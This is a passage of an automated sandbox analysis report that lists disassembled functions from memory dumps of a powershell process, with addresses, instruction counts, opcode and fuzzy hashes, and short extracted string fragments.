                        • Opcode Fuzzy Hash: ea1968ccc90537e62717eb541691f927e321ff08cdb3ae29bba59f6fb7df4adb
                        • Instruction Fuzzy Hash: 15125A74A012089FDB15CFA8C494AAEFBB2FF48314F248659E815EB351C775ED92CB90
                        Function 07366D4B Relevance: .4, Instructions: 448COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dad3980920587e4d52c950388b6031163c3e2284104573b939e884338416f4c2
                        • Instruction ID: 3ae047b8d31ea41ca57362bf06bffdd68c4039db60571aa6626271865f37f9bc
                        • Opcode Fuzzy Hash: dad3980920587e4d52c950388b6031163c3e2284104573b939e884338416f4c2
                        • Instruction Fuzzy Hash: 5002A1B4A00215DFEB24CF54C858B9ABBB2FF85314F54C49AD9096B749C732EC82CB91
                        Function 073659A1 Relevance: .4, Instructions: 395COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8bd10fb5625b9cd3c8c1d767d949c55e74fe5075e40243f32e17cee66d4b01b8
                        • Instruction ID: 0337f4299bbd29746a540d5f9ca93718830edab23759816e4ea50889845036e6
                        • Opcode Fuzzy Hash: 8bd10fb5625b9cd3c8c1d767d949c55e74fe5075e40243f32e17cee66d4b01b8
                        • Instruction Fuzzy Hash: 75F159F4A00201DFEB14CB84C498A9ABBB2FF95314F24C069D9196F759C772EC86CB91
                        Function 048A4AA8 Relevance: .3, Instructions: 326COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2319913941.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_48a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ae70606a141fa935b1cce930736bb5d0b33ede757b702e0e7ba0b99c96f53ed1
                        • Instruction ID: 7da15652806ea58eec913716e09618731a11b52b70ce2e193c5ec143df71ce30
                        • Opcode Fuzzy Hash: ae70606a141fa935b1cce930736bb5d0b33ede757b702e0e7ba0b99c96f53ed1
                        • Instruction Fuzzy Hash: 9DD13B34A00218DFEB14CF98D484A9DBBB2FF48724F248659E845EB351C7B5EC96CB90
                        Function 048A39B0 Relevance: .3, Instructions: 319COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2319913941.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_48a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 61195f740b95deb03380982091d9c9420b487775027e27d5e5913228704e8286
                        • Instruction ID: 5141d1aea9f619c43bf2a24205796b689d1f0a61f6c62556775abb278a139572
                        • Opcode Fuzzy Hash: 61195f740b95deb03380982091d9c9420b487775027e27d5e5913228704e8286
                        • Instruction Fuzzy Hash: 09D1D434A00219EFEB14CF98D484A9DBBB2FF48314F248659E809EB351D775ED92CB90
                        Function 048A9180 Relevance: .3, Instructions: 315COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2319913941.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_48a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 195b972898cfac8143120b9f5858bb5012c40d5324f30a7eaa292d2100dc9d05
                        • Instruction ID: e10b8117d02ef3f8156aa87d1c47408aae347bd9001a5144c06d4269a68df04d
                        • Opcode Fuzzy Hash: 195b972898cfac8143120b9f5858bb5012c40d5324f30a7eaa292d2100dc9d05
                        • Instruction Fuzzy Hash: 81C1CD71A042088FEB14DFA8D944A9DBBF2FF84314F158A58D806DF365DBB4AC49CB50
                        Function 07364EB8 Relevance: .3, Instructions: 275COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 35ebf790d30e38217e7539d8837c6f864bc7781fe3e1c1bd585da46a7f96cb5b
                        • Instruction ID: a51400547bb374f673e41c433605fbb700f57416436cc115dd153ab14aafe94b
                        • Opcode Fuzzy Hash: 35ebf790d30e38217e7539d8837c6f864bc7781fe3e1c1bd585da46a7f96cb5b
                        • Instruction Fuzzy Hash: 28B15EB0B112059FEB14DF54C858B9ABBE2BF89304F14C469D905AF799CB71EC42CB92
                        Function 048AFC04 Relevance: .3, Instructions: 263COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2319913941.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_48a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 64fe98cef69f8a3d2645ff92008986a0db70e303441c403e42c5d64a69a5584c
                        • Instruction ID: 864884a27f93a8a896bb3e946cf95d0a1549ff5231ff5dafa49024479e69d1a3
                        • Opcode Fuzzy Hash: 64fe98cef69f8a3d2645ff92008986a0db70e303441c403e42c5d64a69a5584c
                        • Instruction Fuzzy Hash: 15B16370E00209DFEB11CFA9D8857DDBBF1BF48314F148A29DA15EB254EBB4A855CB81
                        Function 07364E98 Relevance: .3, Instructions: 254COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9ef77727a24b96ba3810610c99d319df29b7aa16f42f7ea1d23cf890a2ce5ebf
                        • Instruction ID: a2cc02bbdc9405ae2b44adbf90f4f0aab5001fd96926a855f0247d61b4d763a6
                        • Opcode Fuzzy Hash: 9ef77727a24b96ba3810610c99d319df29b7aa16f42f7ea1d23cf890a2ce5ebf
                        • Instruction Fuzzy Hash: F1A17DB0A11305AFEB14DF54C458B9ABBB2BF89304F14C46AD5096F799CB32EC45CB92
                        Function 048A89E8 Relevance: .2, Instructions: 200COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2319913941.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_48a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3f20073ad3715a9b2c1efb09951f68d688c9ba906d0c8ccee58a685c856beb4a
                        • Instruction ID: 131e30c5a10465a1f6368fd4fb0681a448ffc40612364180591c23a8cb127e3c
                        • Opcode Fuzzy Hash: 3f20073ad3715a9b2c1efb09951f68d688c9ba906d0c8ccee58a685c856beb4a
                        • Instruction Fuzzy Hash: 66818D30A01248DFDB15EFA4C4849ADBBF2FF89214F1889A9E4459B361D775EC89CB60
                        Function 048A9948 Relevance: .2, Instructions: 193COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2319913941.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_48a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 001f5209bd8f2f9158df8a1c409198da8e18d79b0a6955f0bdbb4727205523dd
                        • Instruction ID: 5075a0161b69c99fea58d0803e83b1e50337a240e2e0280c76f9204e4a7782da
                        • Opcode Fuzzy Hash: 001f5209bd8f2f9158df8a1c409198da8e18d79b0a6955f0bdbb4727205523dd
                        • Instruction Fuzzy Hash: 42719E70A043488FDB24DF68C884A9DBBF2FF85314F148A6AD415DB751DBB1AC86CB90
                        Function 048A9AB6 Relevance: .2, Instructions: 188COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2319913941.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_48a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2f5e6ffc87f3942063be3b3630493b2ce387e0c3c10a90902f8b8fbc677ce8ed
                        • Instruction ID: ac852a5010d0e18494286cc5576cb4c211400bdeb73af71c443fc22a3bbd6b3c
                        • Opcode Fuzzy Hash: 2f5e6ffc87f3942063be3b3630493b2ce387e0c3c10a90902f8b8fbc677ce8ed
                        • Instruction Fuzzy Hash: AB715C70A00648DFEB24DFA4D484BADBBF2BF88304F148969D416EB750DB75AC86CB51
                        Function 07369F0C Relevance: .1, Instructions: 125COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bd2f19dd6cd774874ee30a562719db48e9c347281e1b298528a36900046e3089
                        • Instruction ID: 45b189e79663e0722f5a291fca63c5cc701d429b6ed918cd37beea2097d6150e
                        • Opcode Fuzzy Hash: bd2f19dd6cd774874ee30a562719db48e9c347281e1b298528a36900046e3089
                        • Instruction Fuzzy Hash: 63412EF1705301DFEB259E2484587B67BA6AF81311F19C0AAD908EF699D732DC81C762
                        Function 048A96D9 Relevance: .1, Instructions: 121COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2319913941.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_48a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3d0c7ae2375334237f84f7639773bb953065f80b20f198149b78ecbc6bf56bdd
                        • Instruction ID: 54f1739d2a57556a498cc106a92b59a9081330dd9ed803b05ed6a8cc2fc360cb
                        • Opcode Fuzzy Hash: 3d0c7ae2375334237f84f7639773bb953065f80b20f198149b78ecbc6bf56bdd
                        • Instruction Fuzzy Hash: 1C41A170B042449FE724DF24C958AAD7BF2EF89354F084968E506EB7A0DB75AC41CBA0
                        Function 048A9933 Relevance: .1, Instructions: 120COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2319913941.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_48a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f16415fec0faae66c85eab7ec8fbf616a1fb77dbb52f591175259d4fb94dbfeb
                        • Instruction ID: 42adf0a0fc830d62a43918071038bd2e661bcb8ecee5a2d006d61111e94b4787
                        • Opcode Fuzzy Hash: f16415fec0faae66c85eab7ec8fbf616a1fb77dbb52f591175259d4fb94dbfeb
                        • Instruction Fuzzy Hash: 6F416E70A042489FEB24DF65C84469DBBF2FF85344F148969D405EB750DBB5AC45CB90
                        Function 048AAFB9 Relevance: .1, Instructions: 116COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2319913941.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_48a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4216009f55fcb84abf245b6f1a8b14feaf49712b5d0f6896a02914c77f711ba2
                        • Instruction ID: 67c61337b54224ff78d80681752b10825615deb2b3b2ccf45c792e01fe2de75a
                        • Opcode Fuzzy Hash: 4216009f55fcb84abf245b6f1a8b14feaf49712b5d0f6896a02914c77f711ba2
                        • Instruction Fuzzy Hash: 2C51D974A00209AFDB14DFA8D494A9DFBB2FF88314F24C559E804AB355D775EC86CB50
                        Function 048A2B48 Relevance: .1, Instructions: 112COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2319913941.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_48a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f5c5b4a1d3e588dcda75cdad97d6377ce21ec859869f45bd62b2de7351335483
                        • Instruction ID: af5bb3a39b29f0b1ac14985ab6a6512262382f4277c43011c42784b0555eefc7
                        • Opcode Fuzzy Hash: f5c5b4a1d3e588dcda75cdad97d6377ce21ec859869f45bd62b2de7351335483
                        • Instruction Fuzzy Hash: D341B471D0E3849FDB12DF78C86059ABFB0EF46210B0941D7D484DB363D624E849CBA6
                        Function 07367C4E Relevance: .1, Instructions: 102COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 51e4e112203bb2ae06ce5c6b621e808605a331e2db802c380174e8016e1f897a
                        • Instruction ID: 75ee14336e1085a8543898dd7206dda845ec0fbbd4052e8706d96b90d560760f
                        • Opcode Fuzzy Hash: 51e4e112203bb2ae06ce5c6b621e808605a331e2db802c380174e8016e1f897a
                        • Instruction Fuzzy Hash: 5931A2B0B00214AFE704AB64C864BAE7AB7AB85344F54C419EA016F795CF75DC42CBA1
                        Function 07360EE0 Relevance: .1, Instructions: 94COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8b7805e38d13b0ba19a489b4b8d8214c149c319fac640d505bd7d35aae2a3255
                        • Instruction ID: 4930df5794e805c70c6c57f6066523ebf8302e03a9615d88c897b0d27af58ef7
                        • Opcode Fuzzy Hash: 8b7805e38d13b0ba19a489b4b8d8214c149c319fac640d505bd7d35aae2a3255
                        • Instruction Fuzzy Hash: 57215AF13013066BE72C566A586AF6BB6DAAFC5311F14C43AA909DF6C4C9B5C8818360
                        Function 048A3985 Relevance: .1, Instructions: 80COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2319913941.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_48a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9d655779bbef30b16d77745054596dd6bbfdd805b30cb9446e7e9090feb90738
                        • Instruction ID: ad5551a09e22e26ae2aed0bb89f3913e4a85e5af9a2763744c742e7643beba59
                        • Opcode Fuzzy Hash: 9d655779bbef30b16d77745054596dd6bbfdd805b30cb9446e7e9090feb90738
                        • Instruction Fuzzy Hash: 2A319374A046459FCB01CF58C8909AAFBF1FF49310B1986AAD849EB752C335FC51CBA1
                        Function 07360EC3 Relevance: .1, Instructions: 80COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6dc05f5880ea3a9b6eecafea424377b1fe903b46f1923f13bc955f30896ac061
                        • Instruction ID: be8732ac9c113c5c229dd88a46b1f5be91eacb2efe72099d9f1eace7610a3966
                        • Opcode Fuzzy Hash: 6dc05f5880ea3a9b6eecafea424377b1fe903b46f1923f13bc955f30896ac061
                        • Instruction Fuzzy Hash: 93219EF13093456FE72956265866BB67FA5AF82300F18C066E949DF2C5C6B9CC81C361
                        Function 07363244 Relevance: .1, Instructions: 75COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 240baa606862752d9f76e72d784cdebfabd965ecbb737121a8ca8c9fe5906218
                        • Instruction ID: c6b6a0b3c0b837dcd431935d529c53f24c3be14a22a096282bfbe6d317080339
                        • Opcode Fuzzy Hash: 240baa606862752d9f76e72d784cdebfabd965ecbb737121a8ca8c9fe5906218
                        • Instruction Fuzzy Hash: 9D21F36020D3C56FE7229B248C15B967F62AB83215F58C0DBE189CF2E7C6259C4AC772
                        Function 048A2B22 Relevance: .1, Instructions: 67COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2319913941.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_48a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 35ed400e945bf4d58aa36fbbdf184fe014b7d14cd319e582e0f95f2c4e49e16d
                        • Instruction ID: d558f1f03d7ebd569451f1db91889767ff3d0f782f19bd375cee4809a5c417db
                        • Opcode Fuzzy Hash: 35ed400e945bf4d58aa36fbbdf184fe014b7d14cd319e582e0f95f2c4e49e16d
                        • Instruction Fuzzy Hash: 5E213DB4A00209CFDB10CF98C880AAABBB5FF49310B1585A9E805E7351D735FC56CBA1
                        Function 07360CD0 Relevance: .1, Instructions: 52COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2d9ab414aa4e5db43382bbb5ff45a41e7bc34826ebecc9673da4a8ee5b256096
                        • Instruction ID: edb12d9db41d157fd18e58cf9f1fe76fc581fe84f67513cf34d9bf9897003361
                        • Opcode Fuzzy Hash: 2d9ab414aa4e5db43382bbb5ff45a41e7bc34826ebecc9673da4a8ee5b256096
                        • Instruction Fuzzy Hash: 3601207730021A5BD71C596EE405A77FB9ADFC5122F14C03BDA4DCB245D632D845C760
                        Function 048AF62B Relevance: .0, Instructions: 49COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2319913941.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_48a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b9a5e98d11a4f423abb980754a3c77e5a051a23d5ba34dbade288eccc7865cee
                        • Instruction ID: 94d80809cd60040dc3a58938df18a7a164d36c9d591ed6698861672a2f33d8a2
                        • Opcode Fuzzy Hash: b9a5e98d11a4f423abb980754a3c77e5a051a23d5ba34dbade288eccc7865cee
                        • Instruction Fuzzy Hash: F9117730D04248DBFF34AE98D5987ECBB71AB4931DF181A29C201F61A0EBB468E5CB15
                        Function 048AB0C4 Relevance: .0, Instructions: 47COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2319913941.00000000048A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 048A0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_48a0000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c16bfcc1df69ed973e26bb95233f735e942174f94070bddbbf3bcadd5761a61c
                        • Instruction ID: 03828f2e033e1d279f746c8cc0d25fb01470ef351a3679dcd15575ea524e0b2c
                        • Opcode Fuzzy Hash: c16bfcc1df69ed973e26bb95233f735e942174f94070bddbbf3bcadd5761a61c
                        • Instruction Fuzzy Hash: 8B11D434A00209EFEB05DBA8D484A9DFBB2AF48314F24C559E414AB361C775BC86CB80
                        Function 046FD006 Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2318101108.00000000046FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 046FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_46fd000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b8d94bf9dc26a76c18da6c217aefe8714935eb20674a8d3433f44b022afffdde
                        • Instruction ID: fb6ef88c0943a387920dea8ab679f34c456533d344bb2301e4fd19613dae6e38
                        • Opcode Fuzzy Hash: b8d94bf9dc26a76c18da6c217aefe8714935eb20674a8d3433f44b022afffdde
                        • Instruction Fuzzy Hash: D7014C6204E3C09FE7128B259D94B52BFB4DF53224F1981DBDD898F2A3C2696849C772
                        Function 046FD01D Relevance: .0, Instructions: 45COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2318101108.00000000046FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 046FD000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_46fd000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d793f28c0aaf96838869632597b52af91886b10de384302a9c4ae173db331409
                        • Instruction ID: cbd4e6ff1df79f443aaaa76f4bc5063c6db45e00085427d8bdad829aa4a28c1f
                        • Opcode Fuzzy Hash: d793f28c0aaf96838869632597b52af91886b10de384302a9c4ae173db331409
                        • Instruction Fuzzy Hash: B6012B31508300AFE7204F11ECC4B67BF98DF51325F18C11ADE8A0F282E278B846CAB5
                        Function 073630AC Relevance: .0, Instructions: 24COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 900144f5f2bea29c54b0afbc945a7b1c544b0420acab7d6306807c81733747ec
                        • Instruction ID: 54196894c44a37d5cc9ed92100c6449ff32fe526a84038c52b52291f2290cb33
                        • Opcode Fuzzy Hash: 900144f5f2bea29c54b0afbc945a7b1c544b0420acab7d6306807c81733747ec
                        • Instruction Fuzzy Hash: C4F0397560E2C59FE7129B14D858A20BB71AB82215B19C0DBC58A8F2A7C226D88BC752

                        Non-executed Functions

                        Function 0736CA00 Relevance: 17.9, Strings: 14, Instructions: 368COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'q$4'q$4'q$4'q$d%q$d%q$d%q$d%q$tPq$tPq$$q$$q$$q$$q
                        • API String ID: 0-3996123523
                        • Opcode ID: c74437e07cb4baff472db90a1dff428c731dbd728cdb492722e804b44e49c9ef
                        • Instruction ID: 9d1f06d557767597d58691aef0eb8b7f136b50604a892ecb8e18cef40ba0fe41
                        • Opcode Fuzzy Hash: c74437e07cb4baff472db90a1dff428c731dbd728cdb492722e804b44e49c9ef
                        • Instruction Fuzzy Hash: 04C13CF5B00206CFEB248B69D41876ABBE5FF89211F18D46AD889DB644DB31EC42C771
                        Function 0736D29D Relevance: 14.0, Strings: 11, Instructions: 285COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'q$4'q$tPq$tPq$tPq$tPq$$q$(q$(q$(q$(q
                        • API String ID: 0-1570892024
                        • Opcode ID: 1555e419050b8681c94a5269da1e01d23b8717e88fc0e4762a84ceefb1576cf2
                        • Instruction ID: 32a25547f31b4fd40815385e3c2d5625c1f26fb2ca3528b734409e4ca3107dcb
                        • Opcode Fuzzy Hash: 1555e419050b8681c94a5269da1e01d23b8717e88fc0e4762a84ceefb1576cf2
                        • Instruction Fuzzy Hash: 8DA1F7F0B202069FEF248F55D40976AB7A2BF89215F28C459EC499B788CB31EC41C7A1
                        Function 073623E8 Relevance: 12.8, Strings: 10, Instructions: 310COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q
                        • API String ID: 0-4104424984
                        • Opcode ID: e3272de4a23535fad1eba3a30cbc2ab1eed08886b928025dad1b051776713dba
                        • Instruction ID: 47539e68d7aaf8afc6553d2b3606bde2070d3ca9c0709c8a2c965d4ad4de0e1e
                        • Opcode Fuzzy Hash: e3272de4a23535fad1eba3a30cbc2ab1eed08886b928025dad1b051776713dba
                        • Instruction Fuzzy Hash: ADA159F17043168FEB354A29A81877BBBA5FF81211F16C47AD90DCB289DA71DC81C7A1
                        Function 07364198 Relevance: 10.5, Strings: 8, Instructions: 495COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'q$4'q$$q$$q$$q$$q$$q$$q
                        • API String ID: 0-2370149875
                        • Opcode ID: db42c95c3c6981f1b53599df8268dbc1bafdf75e21fe1ed829e344f0c690df44
                        • Instruction ID: 38671018cefa5c6a1a44c7313905986967a322dfa3cf9211aabe76fd104747f5
                        • Opcode Fuzzy Hash: db42c95c3c6981f1b53599df8268dbc1bafdf75e21fe1ed829e344f0c690df44
                        • Instruction Fuzzy Hash: FFF16EF1F043868FEB258F69D81476ABBE6EF85210B24C07ADC49CB249DA31D941C761
                        Function 073695A8 Relevance: 9.2, Strings: 7, Instructions: 487COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'q$4'q$tPq$tPq$$q$$q$$q
                        • API String ID: 0-2432477355
                        • Opcode ID: cac577b0e509e1b083f21a337b1e229d8209a3e0a27a170f2e44e9b6f2310465
                        • Instruction ID: c388b9aff76f0b9a8ae2f0ae112477bce3bfdfb20d32ce21a7b799554e2be91d
                        • Opcode Fuzzy Hash: cac577b0e509e1b083f21a337b1e229d8209a3e0a27a170f2e44e9b6f2310465
                        • Instruction Fuzzy Hash: 46F149B1B003068FE7248B6998193AABBE5AFC6220F14C07ED949CF255DA31EC41C7A1
                        Function 07361D58 Relevance: 9.1, Strings: 7, Instructions: 396COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000B.00000002.2340973182.0000000007360000.00000040.00000800.00020000.00000000.sdmp, Offset: 07360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_11_2_7360000_powershell.jbxd
                        Similarity
                        • API ID:
                        • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q
                        • API String ID: 0-1721289453
